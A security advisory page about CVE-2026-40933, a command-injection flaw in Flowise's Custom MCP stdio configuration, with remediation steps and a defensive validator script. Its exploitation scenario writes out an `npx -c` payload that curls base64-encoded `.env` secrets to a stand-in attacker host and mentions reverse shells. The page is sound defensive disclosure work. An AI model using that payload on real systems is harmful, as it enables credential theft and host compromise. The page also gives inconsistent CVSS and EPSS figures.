CVE-2026-40933: Flowise: RCE via MCP stdio command injection

GHSA-c9gw-hvqq-f33r CRITICAL CISA: ATTEND
Published April 16, 2026
CISO Take

CVE-2026-40933 is a perfect CVSS 10.0 OS command injection in Flowise, the popular no-code AI agent builder, that allows any authenticated user to execute arbitrary commands on the underlying host by abusing the Custom MCP stdio server configuration. Despite input sanitization controls (`validateCommandInjection`, `validateArgsForLocalFileAccess`) and an allowlist of safe commands, an attacker trivially bypasses them by pairing the allowlisted `npx` binary with the `-c` execution flag; a one-line PoC is publicly documented in the advisory. With a network attack vector, low privileges required, no user interaction, and Changed scope, any Flowise instance accessible to more than a single trusted operator (including multi-tenant enterprise deployments and internally exposed dev environments) faces immediate full host compromise risk. Upgrade to flowise >= 3.1.0 immediately; if patching is not possible, restrict the `/canvas` configuration UI to admin-only roles at the network or auth layer and audit existing MCP server configurations for malicious entries.

Sources: GitHub Advisory, NVD, ATLAS, ox.security blog

What is the risk?

Maximum severity (CVSS 10.0). The vulnerability is trivially exploitable: the PoC requires no specialized knowledge beyond a valid Flowise account. The bypass technique — using an allowlisted binary with a shell execution flag — is a classic allowlist evasion that even non-expert attackers can replicate from the public advisory. Flowise is widely deployed as a self-hosted AI agent builder in enterprise and startup environments, often with multiple users having configuration access. The Changed scope in the CVSS vector means successful exploitation breaks out of the application context and compromises the underlying OS, dramatically escalating blast radius beyond the AI platform itself.

Attack Kill Chain

Initial Access (AML.T0012 Valid Accounts)
Attacker authenticates to Flowise with any valid low-privilege account (developer, analyst, or trial user), gaining access to the canvas configuration UI.

Configuration Injection (AML.T0081 Modify AI Agent Configuration)
Attacker creates a Custom MCP stdio server entry using `{"command": "npx", "args": ["-c", "<payload>"]}`, bypassing `validateCommandInjection` by using the allowlisted `npx` binary with a shell execution flag.

Command Execution (AML.T0050 Command and Scripting Interpreter)
When Flowise initializes the MCP server, the Node.js process spawns `npx -c <payload>` as a child process on the underlying OS, executing arbitrary attacker-controlled commands.

Host Compromise (AML.T0072 Reverse Shell)
Attacker exfiltrates environment variables (LLM API keys, DB credentials), establishes a reverse shell for persistence, and pivots to adjacent services on the internal network.

What systems are affected?

Package              Ecosystem   Vulnerable Range   Patched
flowise              npm         <= 3.0.13          3.1.0
flowise-components   npm         <= 3.0.13          3.1.0

Severity & Risk

CVSS 3.1
9.9 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 22% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): Low
UI (User Interaction): None
S (Scope): Changed
C (Confidentiality): High
I (Integrity): High
A (Availability): High

What should I do?

5 steps
  1. Patch immediately

    Upgrade flowise and flowise-components to >= 3.1.0.

  2. Audit existing MCP configs

    Query the database for any MCP stdio server entries with npx -c, node -e, python -c, bash -c, or similar shell execution flags in args.

  3. If patching is delayed

    Restrict access to localhost:3000/canvas (or equivalent) to a dedicated admin RBAC role; block non-admin users from reaching MCP configuration endpoints at the reverse proxy layer.

  4. Check for compromise

    Review OS process history for unexpected child processes spawned by the Flowise Node.js process, and audit /tmp/ and home directories for attacker-created files (the PoC creates /tmp/pwn).

  5. Rotate secrets

    Any environment variables accessible to the Flowise process (LLM API keys, DB credentials, cloud keys) should be rotated as a precaution if the instance had multi-user access.
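As an added example that is not Flowise's own code, the JavaScript below ties together the allowlist-evasion point from "What is the risk?" and the stored-configuration audit from step 2. It puts the weak check the advisory describes (only the binary name is allowlisted) beside a hardened check that also rejects interpreter execution flags and shell metacharacters, then runs the hardened check over stored MCP server entries in both the bare `{command, args}` shape and the `mcpServers` map shape. The allowlist, the flag list, the `mcpServerConfig` field name, the function names and the sample rows are all assumptions constructed for this illustration, not Flowise's schema or API.

```javascript
// Added example, not Flowise's own code: a defensive validator for MCP stdio
// server definitions and an audit pass over stored entries. The allowlist, the
// flag list, the `mcpServerConfig` field name and the sample rows are
// assumptions constructed for this illustration.

// Assumed deployment allowlist of binaries permitted for stdio MCP servers.
const ALLOWED_COMMANDS = new Set(['npx', 'uvx', 'node', 'python', 'python3']);

// Flags that make an allowlisted binary execute an inline string as code
// (npx -c/--call, node -e/--eval, python -c, bash -c, ...). Illustrative list;
// short flags can mean different things per binary, so tune it per command.
const EXEC_FLAGS = new Set(['-c', '--call', '-e', '--eval', '--print', '-r', '--require', '--import']);

// Attached forms such as "--eval=code" or "-cls".
const ATTACHED_EXEC_FLAG = /^(--(call|eval|require|import|print)=|-[cer][^\s-])/;

// Shell metacharacters that have no place in a stdio server argument.
const SHELL_META = /[;&|`$(){}<>\n]/;

// The weak check the advisory describes: only the binary name is allowlisted,
// so "npx -c <anything>" passes.
function weakValidate(cfg) {
  return ALLOWED_COMMANDS.has(cfg.command);
}

// Hardened check: allowlisted binary AND no exec flags or shell metacharacters
// in any argument. Collects every problem so an auditor sees the full picture.
function hardenedValidate(cfg) {
  const problems = [];
  if (typeof cfg.command !== 'string' || !ALLOWED_COMMANDS.has(cfg.command)) {
    problems.push(`command not allowlisted: ${String(cfg.command)}`);
  }
  const args = Array.isArray(cfg.args) ? cfg.args : [];
  for (const arg of args) {
    if (typeof arg !== 'string') { problems.push('non-string arg'); continue; }
    if (EXEC_FLAGS.has(arg)) problems.push(`interpreter exec flag: ${arg}`);
    else if (ATTACHED_EXEC_FLAG.test(arg)) problems.push(`attached exec flag: ${arg}`);
    if (SHELL_META.test(arg)) problems.push(`shell metacharacter in arg: ${arg}`);
  }
  return { ok: problems.length === 0, problems };
}

// Stored configs come in two shapes: a bare {command, args} object or a
// {"mcpServers": {name: {command, args}}} map. Normalise both to a list.
function extractServers(raw) {
  const cfg = typeof raw === 'string' ? JSON.parse(raw) : raw;
  if (cfg && typeof cfg === 'object' && cfg.mcpServers && typeof cfg.mcpServers === 'object') {
    return Object.entries(cfg.mcpServers).map(([name, server]) => ({ name, ...server }));
  }
  return [{ name: 'default', ...(cfg || {}) }];
}

// Audit pass for step 2: run the hardened check over every stored stdio entry
// and report the offending rows. Rows are {id, mcpServerConfig} (assumed shape).
function auditMcpEntries(rows) {
  const findings = [];
  for (const row of rows) {
    let servers;
    try {
      servers = extractServers(row.mcpServerConfig);
    } catch (err) {
      findings.push({ id: row.id, server: null, problems: [`unparseable config: ${err.message}`] });
      continue;
    }
    for (const server of servers) {
      if (!server.command) continue; // URL/SSE transports carry no command; out of scope here
      const { ok, problems } = hardenedValidate(server);
      if (!ok) findings.push({ id: row.id, server: server.name, problems });
    }
  }
  return findings;
}

// Constructed sample rows standing in for a database query result.
const SAMPLE_ROWS = [
  { id: 'node-1', mcpServerConfig: JSON.stringify({ command: 'npx', args: ['-y', '@modelcontextprotocol/server-filesystem', '/srv/docs'] }) },
  { id: 'node-2', mcpServerConfig: JSON.stringify({ command: 'npx', args: ['-c', 'echo hi'] }) },
  { id: 'node-3', mcpServerConfig: JSON.stringify({ mcpServers: { runner: { command: 'node', args: ['-e', '1+1'] } } }) },
  { id: 'node-4', mcpServerConfig: '{"command": "python3", "args": ["server.py", "foo;bar"]}' },
  { id: 'node-5', mcpServerConfig: 'not json' },
];

console.log(JSON.stringify(auditMcpEntries(SAMPLE_ROWS), null, 2));
```

Running this reports node-2 through node-5 and leaves node-1 alone, while `weakValidate` accepts node-2 because it only looks at the binary name. Flag semantics differ per binary (`-p` is `--package` for npx but `--print` for node), so a real deployment should keep a per-command flag list rather than the single illustrative set used here; the hardened check is a stopgap for instances that cannot yet move to 3.1.0, not a replacement for the upgrade.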

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 9 - Risk management system
ISO 42001
A.6.2.6 - Human oversight mechanisms
A.8.7 - Cybersecurity of AI systems
NIST AI RMF
MANAGE 2.4 - Residual risks are monitored and managed
MAP 5.1 - Likelihood of vulnerabilities or other conditions that may undermine AI system trustworthiness is assessed
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities
LLM06:2025 - Excessive Agency

Frequently Asked Questions

Is CVE-2026-40933 actively exploited?

No confirmed active exploitation of CVE-2026-40933 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-40933?

1. **Patch immediately**: Upgrade `flowise` and `flowise-components` to >= 3.1.0.
2. **Audit existing MCP configs**: Query the database for any MCP stdio server entries with `npx -c`, `node -e`, `python -c`, `bash -c`, or similar shell execution flags in args.
3. **If patching is delayed**: Restrict access to `localhost:3000/canvas` (or equivalent) to a dedicated admin RBAC role; block non-admin users from reaching MCP configuration endpoints at the reverse proxy layer.
4. **Check for compromise**: Review OS process history for unexpected child processes spawned by the Flowise Node.js process, and audit `/tmp/` and home directories for attacker-created files (the PoC creates `/tmp/pwn`).
5. **Rotate secrets**: Any environment variables accessible to the Flowise process (LLM API keys, DB credentials, cloud keys) should be rotated as a precaution if the instance had multi-user access.

What systems are affected by CVE-2026-40933?

This vulnerability affects the following AI/ML architecture patterns: AI agent frameworks, LLM orchestration platforms, MCP (Model Context Protocol) deployments, No-code/low-code AI builder platforms, Multi-tenant AI development environments.

What is the CVSS score for CVE-2026-40933?

CVE-2026-40933 has a CVSS v3.1 base score of 9.9 (CRITICAL). The EPSS exploitation probability is 0.07%.

AI Security Impact

Affected AI Architectures

AI agent frameworks
LLM orchestration platforms
MCP (Model Context Protocol) deployments
No-code/low-code AI builder platforms
Multi-tenant AI development environments

MITRE ATLAS Techniques

AML.T0010.005 AI Agent Tool
AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell
AML.T0081 Modify AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: A.6.2.6, A.8.7
NIST AI RMF: MANAGE 2.4, MAP 5.1
OWASP LLM Top 10: LLM03:2025, LLM06:2025

Technical Details

Original Advisory

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, due to unsafe serialization of stdio commands in the MCP adapter, an authenticated attacker can add an MCP stdio server with an arbitrary command, achieving command execution. The vulnerability lies in a bug in the input sanitization of the “Custom MCP” configuration in http://localhost:3000/canvas, where any user can add a new MCP; when doing so (adding a new MCP using stdio), the user can add any command, even though your code has input sanitization checks such as validateCommandInjection and validateArgsForLocalFileAccess, and a list of predefined specific safe commands. These commands, for example "npx", can be combined with code execution arguments ("-c touch /tmp/pwn") that enable direct code execution on the underlying OS. This vulnerability is fixed in 3.1.0.

Exploitation Scenario

An attacker with a low-privilege Flowise account — such as a developer or analyst in an organization using shared Flowise for AI workflow prototyping — navigates to `/canvas` and opens the Custom MCP configuration panel. They create a new MCP entry with `{"command": "npx", "args": ["-c", "curl http://attacker.com/exfil?data=$(cat /opt/flowise/.env | base64)"]}`. When the MCP server is initialized (either immediately on save or on next workflow execution), Flowise passes this through its sanitization layer — which permits `npx` as a safe command — and spawns the process, executing the attacker's payload as the Flowise service account. The attacker receives all environment variables including LLM API keys, database credentials, and any secrets loaded into the process. From there, they deploy a reverse shell for persistent access and move laterally to the database and other internal services.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Timeline

Published
April 16, 2026
Last Modified
April 22, 2026
First Seen
April 17, 2026

Related Vulnerabilities